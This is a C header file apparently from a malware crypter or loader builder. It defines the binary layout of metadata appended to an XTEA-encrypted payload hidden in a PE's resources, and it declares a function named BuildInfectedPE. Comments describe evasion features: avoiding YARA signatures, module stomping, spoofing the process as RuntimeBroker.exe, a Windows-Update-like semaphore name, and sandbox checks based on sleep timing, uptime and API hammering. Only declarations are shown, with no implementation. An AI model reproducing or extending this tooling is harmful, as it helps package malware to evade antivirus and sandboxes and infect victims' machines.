#ifndef PE_BUILDER_H
#define PE_BUILDER_H

#include <Windows.h>

/*
 * ==========================================================================
 *  PAYLOAD_METADATA — binary layout of the 280-byte block appended after
 *  the XTEA-encrypted blob in the .rsrc section (resource ID 101).
 *
 *  Written by BuildInfectedPE (Engine/PeBuilder.c).
 *  Read by GetPayloadFromResource (Stub/Payload.c).
 *
 *  magic = key_salt[0]^key_salt[1]^key_salt[2]^key_salt[3]
 *  No fixed constant → Stub locates the block by verifying the XOR invariant.
 *  No static YARA anchor possible.
 *
 *  kMagicOffset = sizeof(PAYLOAD_METADATA) - sizeof(DWORD) = 276
 * ==========================================================================
 */
#pragma pack(push, 1)
typedef struct _PAYLOAD_METADATA {
    DWORD key_salt[4];    /* 16 bytes — per-build XTEA key salt (Xtea_DeriveKey input) */
    BYTE  dll_idx[3];     /*  3 bytes — indices into g_DllPool (ModuleStomping)         */
    BYTE  pad;            /*  1 byte  — alignment padding (0x00)                        */
    DWORD origSize;       /*  4 bytes — original decompressed PE size (RtlDecompress)   */
    DWORD stubSize;       /*  4 bytes — mutated ASM decryptor size (bytes)              */
    DWORD blobSize;       /*  4 bytes — total XTEA-encrypted blob size (bytes)          */
    DWORD exportHash;     /*  4 bytes — fixed-seed Djb2 hash of DLL export; 0 = none   */
    CHAR  exportArg[128]; /* 128 bytes — null-terminated export argument (zero-padded)  */
    CHAR  spoof_exe[64];  /* 64 bytes  — ASCII PEB spoof filename (zero-padded)         */
                          /*             e.g. "RuntimeBroker.exe"                       */
                          /*             Stub prepends C:\Windows\System32\ at runtime  */
    CHAR  semaphore_name[32]; /* 32 bytes — exec-ctrl semaphore name (zero-padded)      */
                              /*            empty = use default "wuauctl" at runtime    */
    DWORD sleep_fwd_ms;   /*  4 bytes — sleep duration for sleep-fwd check (ms)        */
                          /*            0 = use default 500 ms                          */
    DWORD uptime_min;     /*  4 bytes — uptime threshold for uptime check (minutes)    */
                          /*            0 = use default 2 minutes                       */
    DWORD hammer_ms;      /*  4 bytes — API-hammer duration (ms); 0 = default 3000 ms  */
    DWORD flags;          /*  4 bytes — OPSEC_FLAG_* + EVASION_FLAG_* bitmask           */
    DWORD magic;          /*  4 bytes — key_salt[0]^key_salt[1]^key_salt[2]^key_salt[3]*/
} PAYLOAD_METADATA;       /* 280 bytes total                                            */
#pragma pack(pop)

static_assert(sizeof(PAYLOAD_METADATA) == 280,
    "PAYLOAD_METADATA size mismatch — a field was added/removed without updating all consumers");

#ifdef __cplusplus
extern "C" {
#endif

/*
 * ==========================================================================
 *  Engine for embedding Payload as a Resource (.rsrc)
 * ==========================================================================
 */

/* Saves mutated shellcode and original payload size to Stub file (creating new Output file).
 *   key_salt[4]       — per-build random salt generated by CryptGenRandom in Builder
 *   dll_indices[3]    — three indices into g_DllPool selecting which DLLs to stomp
 *   exportHash        — fixed-seed Djb2 hash of the DLL export to invoke; 0 = no export call
 *   pExportArg        — optional string argument for the export function; NULL or "" = none
 *   pSpoofExe         — ASCII filename for PEB spoof (e.g. "RuntimeBroker.exe"); must not be NULL
 *   pSemaphoreName    — exec-ctrl semaphore name; NULL or "" = use default "wuauctl" at runtime
 *   sleepFwdMs        — sleep duration for sleep-fwd check in ms; 0 = use default 500 ms
 *   uptimeMin         — uptime threshold for uptime check in minutes; 0 = use default 2 min
 *   hammerMs          — API-hammer duration in ms; 0 = use default 3000 ms
 *   opsecFlags        — OPSEC_FLAG_* bitmask; OPSEC_FLAG_NO_TLS is consumed here (stub patching)
 *                       and not embedded in the metadata */
BOOL BuildInfectedPE(const char* stubPath, const char* outputPath,
                     const BYTE* payloadBuffer, SIZE_T payloadSize,
                     ULONG originalDecompressedSize, DWORD mutatedStubSize,
                     const DWORD key_salt[4], const BYTE dll_indices[3],
                     DWORD exportHash, const char* pExportArg,
                     const char* pSpoofExe,
                     const char* pSemaphoreName,
                     DWORD sleepFwdMs,
                     DWORD uptimeMin,
                     DWORD hammerMs,
                     DWORD opsecFlags);

/* Reads entire file from disk */
BOOL ReadFileToBuffer(const char* filePath, BYTE** outBuffer, DWORD* outSize);

/* Writes entire buffer to disk */
BOOL WriteBufferToFile(const char* filePath, const BYTE* inBuffer, DWORD inSize);

#ifdef __cplusplus
}
#endif

#endif /* PE_BUILDER_H */
